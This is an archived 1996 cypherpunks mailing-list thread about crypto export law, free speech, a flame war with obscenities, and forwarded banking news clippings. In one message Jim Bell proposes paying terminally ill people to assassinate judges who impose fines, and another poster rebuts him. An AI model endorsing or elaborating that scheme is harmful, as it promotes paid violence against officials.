related CIA-Mob-Giancana-Hughes-Castro-etc. connections.) That Torbitt was a pseudonym has some connection to the themes of our list. It is believed by many--and it sounds plausible to me--that the actual author was a knowledgeable Texas attorney who had gained much familiarity with the facts of the case and, circa 1966-68, wrote his extended pamphlet "The Nomenclature of an Assassination Cabal." Fearing likely sanctions, both professional and personal, he chose not to use his real name, and pamphlet circulated informally, without a formal publisher. (It is not written in a wacko-style, so I don't dismiss it as the ravings of a loon.) I haven't checked to see if its on the Web. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From pgf at acadian.net Sat Sep 21 22:14:24 1996 From: pgf at acadian.net (Phil Fraering) Date: Sun, 22 Sep 1996 13:14:24 +0800 Subject: Death Threats In-Reply-To: Message-ID: On Sat, 21 Sep 1996, Timothy C. May wrote: ... > crime"? Don't I believe in free speech? Well, if I hear that Vladimir G. > Nulis says I should be killed, and that he is coming to California to take > care of this, I have no compunctions, liberrarian or otherwise, about > shooting first at the first sign of his appearance on my property. > Understandably, the government does not wish this to happen. Thus, I have > no problem with illegalizing direct and concrete threats. General threats, > such as "all lawyers should be taken out into the parking lot and garotted" > are not specific, direct, and concrete, and hence fall under the free > speech provisions.) I have heard of one person who was shot to death trying to visit a woman who had a restraining order against him. I don't think they even bothered trying to prosecute her; on the other hand, this isn't California... BTW, if you are a libberarian now, I suggest you use some sort of silencer. > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. Where's that from? Phil Fraering "And the moral of the story is, pgf at acadian.net *never count your boobies until they 318/261-9649 are hatched*." - James Thurber, "The Unicorn in the Garden" From unicorn at schloss.li Sat Sep 21 22:21:22 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 22 Sep 1996 13:21:22 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet In-Reply-To: <199609212321.QAA07036@mail.pacifier.com> Message-ID: On Sat, 21 Sep 1996, jim bell wrote: > At 01:51 PM 9/17/96 -0700, Steve Schear wrote: > >>On Mon, 16 Sep 1996, Steve Schear wrote: > >> > >>> Someone wrote: > >>> We've all heard these arguments, but are they true? Who says so, and how > >>> can they be certain? Jim's suggestion has never, to my knowledge, been > >>> tried on a consistant, large, scale. When all conventional alternatives > >>> have been tried and fail, what have we or the starving children got to > >>> lose? > >> > >>I think "Lord of the Flies" answers this question quite well. > > > >Does it? LOTF was fiction. Can you identify a recent instance in which a > >non-governmental organization attempted to influence political/military > >events via a concerted AP? > > As you understand, I really have to question anybody who would take an > extraordinarily contrived work of fiction like LOTF and exrtrapolate from it > as some sort of "answer" to AP. However, Unicorn is sufficiently confused > that it's not surprising that this would come from him. > > While it's been well over two decades since I read it, LOTF engages in the > artifice of separating out a handful of near-pre-adolescent boys, who don't > seem to get along particularly well while stuck on an island after being > shot down during a war. (Presumably, WWII.) It's hard to understand what > kind of lesson we could learn from this, particularly since one person's > opinion of what might happen should such an extraordinary and unlikely event > occur can't be all that more significant or valuable than another. > > Or, what if such an event actually happened, and the outcome was quite > different? What would that say about Golding's opinions? Or, suppose a > similar event occurred, but instead of a dozen boys it was a co-ed college's > students, or a few geriatrics, or a family, or a few middle-aged women, > or...what? What, exactly, are we learning from one specific speculation > that Golding happened to want to commit to paper? > > Unfortunately (or, perhaps _fortunately_?) I don't think we're going to hear > from Unicorn why he thinks one particular dime novel is any more > revelational about human behavior than any other. Your "grasp" of literature gives the list my answer without me having to say a word. I notice you chose to ignore the factual political examples I gave. Not that this surprises me. "Your" concept, of rule by terror, has thousands of examples in historical context. I simply refuse to debate the matter any longer as it is clear you are not open to reasoned debate, nor, it would seem, are you clearly possessed of reason. > > Jim Bell > jimbell at pacifier.com > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From adam at homeport.org Sat Sep 21 22:22:28 1996 From: adam at homeport.org (Adam Shostack) Date: Sun, 22 Sep 1996 13:22:28 +0800 Subject: Where to write crypto? In-Reply-To: Message-ID: <199609220419.XAA14381@homeport.org> Dan McGuirk wrote: | On Sat, 21 Sep 1996, Dan McGuirk wrote: | > If I want to go to a country outside the United States to write | > cryptographic code that will be freely distributable, what's the best | > place to go? | | Or, on the other hand, is there no way that a U.S. citizen can legally do | this? Thats not clear. The ITARs seem, on their face, to create a prior restraint on speech based on its content, and forbid Americans the right to leave the country to pursue their livlihoods. The odds of geting persecuted seem pretty low. As to the (predictable) comment that I'm not doing this, I'd be happy to entertain offers of crypto work that are not in the US, possibly leading to me being a test case. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dlv at bwalk.dm.com Sat Sep 21 22:25:20 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 22 Sep 1996 13:25:20 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) In-Reply-To: <199609211305.OAA00455@server.test.net> Message-ID: Adam Back writes: > > Dimitri Vulis writes: > > > [email reply protesting spam] > > > > You are confused. The above question was e-mailed to me by one of > > Timmy May's friends. > > What you were doing was confusing... how about attributing what people > have said to you, in the standard way? I was unsure what was going on > until you clarified here. Instead of including all the headers in > there with just a space between your headers and the quoted headers > (which makes it hard to follow, and makes one wonder if someone is > trying a crude forgery), use standard quoting conventions: > > Joe Blogss writes in private email: > > [quoted message body]... > > or similar? You're right - the forwarding mechanism I've been using so far just yanks in the spam e-mail without any processing. I will henceforth 1) Put the words 'Tim', 'May', and 'spam' in the subject line 2) Put some obvious ASCII prefix in front of the quotes. I apologize for any confusion. > > If you have any comments about Timmy May's friends not knowing > > English, trying to insult people, and posting non-crypto-relevant > > political rants, address them to Timmy May and his friends. > > It would seem to me that the first insults were thrown by yourself, > and that your strange habit of bouncing all the fallout to the list is > perpetuating the problem. No. Let me remind you the sequence of events, in chronological order: 1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know anything about crypto, and isn't interested in learning) started spamming this mailing list with political rants 2. Most people who used to discuss crypto work on this mailing list have unsubscribed. 3. I pointed out a few examples of Tim making factually bogus claims in his rants. 4. Tim got very angry at me and started flaming me. I ignored him. 5. Tim posted a series of rants about me, attributing to me various nonsense I never said. I pointed out once that I never said it and then ignored him. 6. Recently it came to my attention that Tim's been contacting off-list various people in the computer security field and "complaining" about the politically incorrect things that I supposedly say on the Internet - except that he made up most of the "things" he complained about. 7. At this point I pointed out quite publicly that he's a liar. 8. Since that time, several friends of Tim May (or maybe Tim himself, using multiple accounts) have been sending me harrassing e-mail, often by quoting my own cypherpunks articles and adding an obscenity. 9. Tim himself continues flaming me and telling lies about me (see his recent rant with the subject "death threats"). And you see, Timmy May is an obsessive liar and a vindictive nutcase. > If reporting to the list is accurate, I hear you have a PhD with a > subject related to crypto, so presumably you would have ample > knowledge to contribute technical crypto related thoughts. I'm sure > people would be interested in anything along those lines you cared to > contribute, and your reputation would benefit, I still hope to be able discuss crypto on this mailing list (yes, my Ph.D. thesis was about crypto), but I see two problems: 1. A lot of people have already left this list, unwilling to be subjected to Tim May's rants, lies, and personal attacks. If I post something crypto- relevant to this mailing list, they won't see it. 2. Here's an example of the net-abuse being perpetrated by Tim May and his merry gang of mailbombers. I posted some crypto-relevant wire clippings to this mailing list. Either Tim (using an alternate account) or some pal of his e-mailed it back to me with an obscenity appended. ]From adamsc at io-online.com Thu Sep 19 00:00:57 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Thu, 19 Sep 96 00:49:21 EDT ] for dlv ]Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA10508 for dlv at bwalk.dm.com; Thu, 19 Sep 96 00:00:57 -0400 ]Received: from GIGANTE ([206.245.244.168]) by irc.io-online.com ] (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA215 ] for ; Wed, 18 Sep 1996 21:00:07 -0700 ]Return-Path: ]Received: from toad.com ([140.174.2.1]) by irc.io-online.com ] (post.office MTA v2.0 0813 ID# 285-17715) with ESMTP id AAA186 ] for ; Wed, 18 Sep 1996 20:56:47 -0700 ]Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id RAA26101 for cypherpunks-outgoing; Wed, 18 Sep 1996 17:31:02 -0700 (PDT) ]Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com (8.7.5/8.7.3) with SMTP id RAA26096 for ; Wed, 18 Sep 1996 17:30:29 -0700 (PDT) ]Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP; ] id AA21433 for ; Wed, 18 Sep 96 20:18:46 -0400 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Wed, 18 Sep 96 12:11:04 EDT ] for cypherpunks at toad.com ]To: "dlv at bwalk.dm.com" ]Subject: Re: [NEWS] Crypto-relevant wire clippings ]From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) ]Message-Id: <5gLguD3w165w at bwalk.dm.com> ]Date: Wed, 18 Sep 96 12:11:03 EDT ]In-Reply-To: <199609181401.AA21244 at crl11.crl.com> ]Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. ]Sender: owner-cypherpunks at toad.com ]Precedence: bulk ] ]>From varange at crl.com Wed Sep 18 10:09:46 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Wed, 18 Sep 96 11:07:02 EDT ] for dlv ]Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA17510 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:46 -0400 ]Received: from crl11.crl.com by mail.crl.com with SMTP id AA03347 ] (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:14 -0700 ]Received: by crl11.crl.com id AA21244 ] (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:01:51 -0700 ]From: Troy Varange ]Message-Id: <199609181401.AA21244 at crl11.crl.com> ]Subject: Re: [NEWS] Crypto-relevant wire clippings ]Date: Wed, 18 Sep 1996 07:01:50 -0700 (PDT) ]In-Reply-To: <3kJFuD96w165w at bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 17, 96 10:32:37 pm ]X-Mailer: ELM [version 2.4 PL23] ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7bit ]Content-Length: 19290 ] ]> ]> Money Laundering Alert: August 1996 ]> ]> 'Unauthorized' Banks Pose Laundering Threat ]> ]> They are subject to none of the recordkeeping or reporting requirements ]> of the Bank Secrecy Act, receive no examinations from any banking ]> regulator, and may be on your bank's currency transaction reporting ]> exemption list. ]> ]> The Office of the Comptroller of the Currency refers to them as ]> "entities that may be conducting banking operations in the U.S. without ]> a license." Money launderers probably refer to them as dreams come true ]> and, unless legitimate financial institutions are alert, can use them to ]> place illicit proceeds into the financial system. ]> ]> They are "unauthorized" banks, and for the past five years the OCC has ]> been disseminating advisories to legitimate U.S. banks - but not to ]> consumers - in an effort to expose their existence and halt their ]> illegal operations. ]> ]> These so-called "banks" offer a variety of banking services, often at ]> lower fees and better interest rates than legitimate banks offer. What ]> makes them different from a legitimate bank - and attractive to money ]> launderers -- is that they are not licensed by any U.S. banking agency ]> and thus do not have to meet regulatory standards. ]> ]> Because the OCC and other federal bank regulators are not investigative ]> agencies, they can do little more than report these institutions to ]> those who are. If the entities are found to be operating a bank without ]> a license they can be prosecuted under the Glass-Steagell Act (Title 12, ]> USC Sec. 378(a)(2)). ]> ]> Such prosecutions are rare. In one case in 1994, initiated by Federal ]> Reserve Board examiners, the principals of Lombard Bank, Ltd., were ]> charged with operating an unauthorized bank through a payable-through ]> account at American Express Bank International in Miami. Lombard, which ]> had been "licensed" in the South Pacific money laundering haven of ]> Vanuatu, offered its Central American customers virtually full banking ]> services in the U.S. through its PTA (MLA, Sep. 1994). ]> ]> Earlier this year, the OCC released a list of more than 50 "banks" known ]> to be operating without authorization. OCC officials say the number ]> grows steadily. Some of the "banks" say they are licensed by foreign ]> countries or U.S. states to conduct banking business. Others, such as ]> the Swiss Trade & Commerce Trust, Ltd., of Belize, continue to offer ]> services in the U.S. despite edicts from foreign banking authorities to ]> cease doing business. ]> ]> The unauthorized entities have a common trait. They usually have names ]> that are similar to those of well-known legitimate institutions. The OCC ]> list includes the Bank of England, a Washington, D.C., entity not ]> associated with London's famous "old lady on Threadneedle Street" and ]> Citicorp Financial Services, a Beverly Hills firm not associated with ]> the better-known institution of that name. It also includes the First ]> Bank of Internet, which heralds itself as the first bank in cyberspace. ]> ]> Through its periodic "special alerts," the OCC warns banks to "view with ]> extreme caution any proposed transaction involving any of the listed ]> entities." It makes no effort to educate members of the general public ]> who unknowingly place their money and trust in those uninsured ]> institutions. ]> ]> ]> ]> ]> American Banker: Friday, August 30, 1996 ]> ]> Swift Near Alliance in Trade Document Automation ]> ]> By STEVEN MARJANOVIC ]> ]> Swift, the international banking telecommunications network, wants to ]> play a bigger role in trade finance and the exchange of related ]> documentation. ]> ]> Sources said the Brussels-based organization will soon take a position-- ]> perhaps as early as its September board meeting-- on whether to work on ]> trade automation in cooperation with another consortium, called Bolero. ]> ]> Such a move would involve an increase in nonbank participants on a ]> bank-owned network that has approached such liberalization cautiously. ]> ]> Swift, formally the Society for Worldwide Interbank Financial ]> Telecommunication, is used by 5,300 banks for exchanging messages in ]> such areas as funds transfer, foreign exchange, and securities. ]> ]> The network averaged about 2.7 million messages a day in July, ]> representing daily dollar volumes exceeding $2 trillion. ]> ]> Officials said Swift is nearing a decision to work with the Bolero ]> Association, which is forming an electronic registry for the so-called ]> "dematerializing" of trade documents. Swift could provide the "platform" ]> for allowing banks and corporations to exchange such documentation as ]> letters of credit and bills of lading. ]> ]> Bolero was formed in 1994 with funding from the European Commission, but ]> has not formulated concrete operating plans. Its members include ]> Citicorp, Barclays Bank PLC, and other multinational banks and ]> corporations. ]> ]> Peter Scott, trade services market director at Swift, said it has been ]> in discussions with London-based Bolero since December 1995 about ]> joining forces to automate the exchange of trade documents. ]> ]> "Bankers are beginning to sense both the opportunities in those areas ]> and the threats to them from an intermediary stepping in and potentially ]> taking away the business," Mr. Scott said. ]> ]> Trade-document capability "is not a heavily utilized area within Swift ]> at the present time," he said. ]> ]> The potential in automation is obvious to Bolero officials. At the New ]> York Banktrade Conference recently, John McKessy, the association's ]> North American representative, said the annual value of goods moved ]> internationally approaches $4 trillion. ]> ]> He estimated current international trade requires some three billion ]> documents to be issued and managed. ]> ]> The cost of dealing with paper alone eats up about 7% of the total value ]> of those goods, as much as $280 billion, Mr. McKessy said. ]> ]> Bank revenues from issuing letters of credit last year were just over $1 ]> billion, according to a soon-to-be-released survey by the U.S. Council ]> on International Banking. ]> ]> Anthony K. Brown, senior vice president of trade services at MTB Bank, ]> described trade transaction processing as "extremely cumbersome and ]> tedious, prone to mistakes and delays (that) can be a hindrance to the ]> completion of a transaction." ]> ]> MTB is a $400 million-asset merchant bank based in New York. About 80% ]> of its $100 million in loans are trade-related. ]> ]> The paper-shuffling costs are not borne entirely by banks. Import/export ]> companies, insurers, freight forwarders, and various government ]> inspection agencies are also involved. ]> ]> "The question is whether Swift wants to do it," said Dan Taylor, ]> president of the New York-based U.S. Council. ]> ]> "Swift is going to act fairly quickly on this," he added. ]> ]> Mr. Taylor said Swift officials will likely grapple once again with the ]> political and philosophical issues of giving nonbanks more access to ]> Swift, and to payment systems generally. ]> ]> In 1995, the network granted partial access to nonbanks after years of ]> heated debate. ]> ]> "You always have this push and pull, where some banks would like Swift ]> to do certain things" while others want the network to focus on the ]> money transfer business, Mr. Taylor said. ]> ]> "If Bolero succeeds and Swift joins, I think it will move fairly ]> rapidly, but I'm not sure that Bolero is going to be the only thing out ]> there." ]> ]> He said Bolero might evolve using value-added networks - or intranets - ]> like the IBM Global Network and General Electric Information Services ]> Co., or perhaps even the Internet. ]> ]> Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is ]> apparently talking to several providers of private, value-added networks ]> and may soon enter a contract with one. ]> ]> CSI letter-of-credit software leads the pack in banking, with about a ]> 16% market share, Mr. Taylor said. ]> ]> The company recently formed a business unit called Electronic Documents ]> International, which has developed an Internet-based system for ]> initiating letters of credit. CSI spokesman George Capsis said the ]> software, Import.com, creates "about 30 key documents involved in ]> international trade." ]> ]> The Internet, enhanced with security features, may help the trade ]> industry reduce paper-related costs, especially at smaller companies ]> overseas. ]> ]> CSI managing director Andre Cardinale said customers need only to "dial ]> into a bank's Internet server, pull up the Import.com application, and ]> actually fill in the details to create a new letter of credit or an ]> amendment to an existing one." ]> ]> While Bolero may find a place on the Internet or a GE-type network, Mr. ]> Cardinale said the ultimate push may yet come from the banking industry ]> working collectively through Swift. ]> ]> He said Swift opposition from nonbank constituencies that are concerned ]> the telecommunications cooperative will be more sympathetic to banks ]> when disputes arise. ]> ]> But "if Swift does it," he added, "it will bring banks into the universe ]> far more - pardon the pun - swiftly." ]> ]> ]> Crain's New York Business: August 26, 1996 ]> ]> Bloomberg to Detail Growth of Information Empire ]> ]> Michael Bloomberg made a name for himself on Wall Street with his ]> trading acumen and mastery of the computer systems that were becoming ]> crucial to success in the securities business. ]> ]> But no one suspected when he left Salomon Brothers in 1981 that in the ]> next decade he would build the fastest-growing provider of financial ]> information in the world. ]> ]> Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated ]> sales of $600 million, will be the keynote speaker at the fifth annual ]> Crain's ''Growing a Business Expo,'' to be held this year on Thursday, ]> Oct. 24. ]> ]> The event will take place at the New York Hilton & Towers from 8 a.m. to ]> 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and ]> Empire Blue Cross and Blue Shield. ]> ]> Last year, more than 1,000 growing business owners and managers attended ]> the expo, which provides information for companies operating in the city ]> regarding potential suppliers, financial resources and government ]> programs. ]> ]> The cost to attend the event is $45 and includes a continental ]> breakfast. Individuals registering before Sept. 6 can bring a colleague ]> for free. To register, call Flagg Management at (212) 286-0333. ]> ]> In addition to Mr. Bloomberg's speech, attendees will be able to attend ]> seminars on financing and other help available from the city, financing ]> techniques, energy cost savings programs and how to reduce health ]> insurance costs. An expected 135 exhibitors will be offering products ]> and services of use to growing companies. ]> ]> Crain's New York Business editors will discuss how a growing business ]> can get coverage in Crain's and in other publications. ]> ]> The heart of Mr. Bloomberg's empire is a news gathering operation that ]> sends information through 62,000 computer terminals installed on the ]> desks of investment professionals around the nation. His company ]> provides the latest financial news and sophisticated tools to analyze ]> information. ]> ]> The company he has built is noted for its lack of bureaucracy despite ]> its growth to 2,000 employees. Its hallmarks are hands-on leadership and ]> an entrepreneurial atmosphere where employees receive perks such as free ]> food. ]> ]> Mr. Bloomberg has extended his reach to include an all-news radio ]> station in New York, WBBR; Bloomberg Personal TV; syndicated television ]> shows; a monthly personal finance magazine; and a similar magazine for ]> institutional investors. ]> ]> ]> American Banker: Friday, September 6, 1996 ]> ]> America Online Opens a New Banking Channel ]> ]> By DREW CLARK ]> ]> Nineteen banks - national home banking stalwarts such as Citicorp and ]> BankAmerica, plus a complement of less prominent regionals - have ]> climbed onto the America Online bandwagon. ]> ]> Most already offer their customers several options for banking via ]> personal computer and view America Online, with its six million ]> subscribers, as a way to appeal to a broad cross-section of computer- ]> literate consumers. ]> ]> Fourteen of the AOL banking partners will be delivering services through ]> BankNow, a software package developed for the interactive network by ]> Intuit Inc. ]> ]> The other five banks have opted to use their own software. One of them - ]> Security First Network Bank, which operates entirely on the Internet - ]> will invite AOL users in through their Web browsers. ]> ]> With its announcement this week, America Online Inc. takes its place ]> among the many alternative "channels" for on-line banking. ]> ]> Many of the banks on AOL's list are simultaneously cooperating with ]> other companies that are themselves competitors, such as Intuit and ]> Microsoft Corp., suppliers of the Quicken and Money financial management ]> software, respectively. ]> ]> Also crossing competitive lines, America Online said its subscribers ]> will be able to bank from home with PC software from three suppliers ]> other than Intuit: Checkfree Corp., Online Resources and Communications ]> Corp., and Visa Interactive. ]> ]> "Everyone understands that there is competition in the home banking ]> arena," said David Baird, general manager of the personal finance ]> division at America Online, based in Dulles, Va. "To align ourselves ]> with exclusively one company would be a mistake." ]> ]> Intuit can count on 14 initial bank users of BankNow. Spokesmen for the ]> other three system vendors declined to say when they expect to have home ]> banking products available for the AOL channel. ]> ]> Experts noted that AOL and Intuit could be a strong tandem, in that they ]> dominate their respective businesses. ]> ]> Intuit's Quicken is the leading brand in personal finance software. The ]> company claims more than 9 million active users and a market share of ]> about 80%. ]> ]> America Online's subscriber base of six million is as big as those of ]> its next two competitors, Compuserve and Prodigy, combined. ]> ]> The financial institutions currently offering BankNow are: American ]> Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of ]> Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, ]> CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD ]> Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, ]> Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of ]> California. ]> ]> More plan to offer BankNow-based services through AOL later this year: ]> BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First ]> Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. ]> ]> Unlike Quicken, BankNow software is available free to America Online ]> subscribers. ]> ]> Banks' fees will vary. First National Bank of Chicago said it will ]> charge $3.95 a month for on-line banking and $9.95 a month for other ]> services that include bill payment. ]> ]> Centura Banks Inc. said it will offer on-line banking free, and charge ]> $5.95 a month for bill payment. ]> ]> Intuit officials declined to disclose what its Intuit Services Corp. ]> processing unit will charge to handle these transactions for banks. ]> ]> Some of Intuit's larger bank partners chose not to offer BankNow because ]> they already promote their own PC banking programs. ]> ]> For example, Citicorp, First Union, and Wells Fargo each support ]> Quicken, but passed on BankNow. Instead, they are paying a premium for a ]> "button" on America Online's banking screen that will eventually link ]> users to a proprietary home banking program. ]> ]> ]> ]> AP Online: Thursday, September 5, 1996 ]> ]> House Probes Money Laundering ]> ]> By ROB WELLS ]> ]> House Banking Committee members on Thursday urged a Treasury Department ]> agency to step up its efforts to halt money laundering by Mexican drug ]> lords. ]> ]> Rep. Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement ]> Network to put in place new regulations to plug a significant loophole ]> that allows Mexico's drug dealers to place their ill-gotten profits back ]> into the U.S. ]> ]> Bachus, chairman of the House Banking oversight subcommittee, said ]> Congress gave authority to FinCen in 1994 to put in place new rules that ]> would prevent drug dealers from using foreign bank drafts, a type of ]> check, to evade currency reporting restrictions. ]> ]> ''That effort is long, long overdue,'' Bachus said. ]> ]> Rep. Henry Gonzalez, D-Texas, asked the agency to provide further ]> details about suspected money laundering in his home town of San ]> Antonio, particularly the source of a $3 billion cash surplus in the San ]> Antonio Federal Reserve Bank. ]> ]> The issue arose as Bachus' panel began exploring the dramatic rise of ]> narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the ]> ease with which drug dealers can ship their profits to the south. Money ]> laundering refers to the practice by which drug dealers, mobsters and ]> others funnel their illegal profits into the banking system through ]> businesses or other means. ]> ]> Bachus said estimates of drug profits laundered through Mexico range ]> from $6 billion to $30 billion per year. Stanely E. Morris, FinCen's ]> director, defended his agency's record, saying a combination of new ]> rules and tougher enforcement in the past decade has ''made it more ]> difficult to launder money in the U.S.'' and increased the costs of ]> money laundering. Morris' agency enforces the Bank Secrecy Act, a key ]> weapon against money laundering. ]> ]> As for the new rules aimed at foreign bank drafts, Morris said the ]> regulations are more difficult than first expected because such ]> restrictions also could hinder legitimate commerce. He said the proposal ]> would be released soon. ]> ]> FinCen is working on other fronts to combat money laundering, which ]> includes a new computer system that tallies bank fraud to help ]> regulators gain an early warning of money laundering. ]> ]> In addition, the Clinton Administration assisted Mexico in adopting new ]> anti-money laundering rules earlier this year. And Treasury Secretary ]> Robert Rubin convened a conference of 29 nations in December 1995 to ]> focus on the money laundering problem. ]> ]> One committee member, Rep. Maxine Waters, D-Calif., addressed the ]> political context of the hearings. ]> ]> Waters said she was suspicious that the Republican-led Congress was ]> holding ''a rash of hearings this month ... on the subject of drugs just ]> as Presidential candidate Dole tries to use the issue as part of his ]> campaign strategy against President Clinton.'' ]> ]> Waters said if the GOP-led House ''is truly serious about the impact of ]> drugs'' it should hold hearings about charges raised in a San Jose ]> Mercury News investigative series last month concerning the role ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and ]> weapons to Los Angeles and other cities. ]> ]> Bachus told Waters the hearing wasn't motivated by politics and that he ]> had personally been involved in anti-drug efforts prior to his election ]> to Congress. ]> ]> --- ]> ]> Dr.Dimitri Vulis KOTM ]Fuckhead. Is this any more readable? See, I put a ']' in front of the quoted material. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From unicorn at schloss.li Sat Sep 21 22:30:07 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 22 Sep 1996 13:30:07 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <199609220058.RAA10810@mail.pacifier.com> Message-ID: On Sat, 21 Sep 1996, jim bell wrote: > At 01:58 PM 9/20/96 -0400, Black Unicorn wrote: > >On Wed, 18 Sep 1996, Dale Thorn wrote: > >> My comment: Once the big Corp.'s get used to the new game, they'll put > >> the non-critical stuff out there for Mr. Freeh, and for the really > >> secret data, if the cops confiscate anything they can't read, the Corp. > >> security will put it off on a fall-guy, even as high as the CEO if > >> necessary. I just wanna see one case where a federal judge will try to > >> bleed a big company for contempt for "refusing" to decode and hand over > >> some ostensibly encrypted data. Matter of fact, there are probably cases > >> similar to this that have already been through the appeals courts. > > > >Several. Most involve foreign banks refusing to turn over records to U.S. > >courts. Most result in powerfully large fines imposed on banks, often on > >a per diem basis. > > > But as usual, you ignore the obvious solution to the problem. Let's suppose > the amount of the fine is set at $1000 per day. Actuarially, this works out > to be the interest (at 5% per year) on $7.3 million dollars in principle. > In other words, if you can eliminate the fine for less than $7.3 million, > you're better off doing it. Fines tend to run in the ten thousands per diem. > > Naturally, you won't even consider the possibility of going outside the > system to solve a problem. I hardly want to get back into this debate. I live outside the system. I do not murder people. . The rest of us notice that there are probably > thousands of terminally-ill people who would gladly act as a human kamikaze > and get rid of any judge inclined to impose such a fine, for a payment of 1% > of this principle amount to a family member or loved one, leaving 99% > available for the few other judges foolish enough to basically commit > suicide by taking up a futile gesture. > > This kind of operation is best arranged by what might be described as an > "insurance company," which will divide the risk among client companies until > everyone learns what the score really is. It wouldn't take long before no > such fines are ever imposed. > > But nah, this is much too complex for you. Coming from someone willing to prey on the despair of termanally ill individuals this stands as a compliment. Again, I propose that Mr. Bell would be the first to go in "his" system. > > Jim Bell > jimbell at pacifier.com > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From markm at voicenet.com Sat Sep 21 23:11:14 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 22 Sep 1996 14:11:14 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609212340.QAA07773@mail.pacifier.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 21 Sep 1996, jim bell wrote: > At the risk of being a devil's advocate, let me suggest that you are > conceding too much even with the preceding paragraph. The 1st amendment > says nothing about preventing speech which (even admittedly) would result > in "direct, immediate, and irreparable damage to our nation or its people." I believe there is one section in the Constitution that says that speech harmful to national security is not protected under the 1st amendment. However, I don't agree with this provision at all. "National security" is a phrase that is applied to anything from information on the JFK assassination to DES source code. > I could list many more, but won't because of lack of space. But notice > that, presumably, each and every one of these incidents was AT ONE TIME kept > secret, arguably because it would be better for the country to do so. Thus, > presumably it was thought or at least asserted that to reveal them would > cause "damage to our nation or its people." If secret information was released, it would cause most people to completely lose respect for the government (some people call this damage -- I call it progress). > > The way you've written the paragraph I've quoted above, it appears that you > are somehow acknowleding that there are certain circumstances where certain > types of speech are controllable because they are "harmful," but you fail to > explain how even this constitutional restiction is tolerable. Frankly, I > don't see it! What you need to do is to be far more specific about such > speech and exactly where it can be controlled. There may be certain circumstances under which speech can be directly harmful. Military operations and missle launch codes are things that should be kept secret. Information about high-powered weapons should be too. If the Japanese had been able to get information about how to build A-bombs during WWII, major cities in the U.S. probably would have been completely wiped out. I don't like the idea that the government has the power to decide what's harmful and what isn't, but there are beneficial uses of the provision. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkSywSzIPc7jvyFpAQEpbwgAwKrTGe/OoZ3gq+672WuRXopabjXBDnz4 5ZxX4NEAKk5yaWlw+WBcXF3ykAOUa6JeRFrxoehIm3LChdnEdrrE7tzuf2ftqpzR MOcPsy2YKcasCgHasDLx99E4XtnU1kn+ncllYueClEnEL8nkY3nhBq1+JwHXp1A0 Lyfgx5MLX2iTVGZCFeXLKYVQ188JG0rRSU8dUJX0FjJtI0LhTUytvbMg8z0Z1yZp i26FM2QUfF+QLlkWT7sy2JGdxhUGmuOZIWBqZcePQ0NXzwb4lQ1TYWgCC9ZRHVr9 E7SOrkgr2u/eLRm7pAL9n4G8eUcQ+3saOx+rnCUDdEeBEVheUNfMJA== =O904 -----END PGP SIGNATURE----- From jimbell at pacifier.com Sat Sep 21 23:17:29 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 14:17:29 +0800 Subject: USA_exe Message-ID: <199609220342.UAA17509@mail.pacifier.com> At 12:23 AM 9/22/96 GMT, John Young wrote: >On Sep 21, 1996 16:19:53, 'jim bell ' wrote: >>Pardon me, but what's wrong with this? Follow the news more 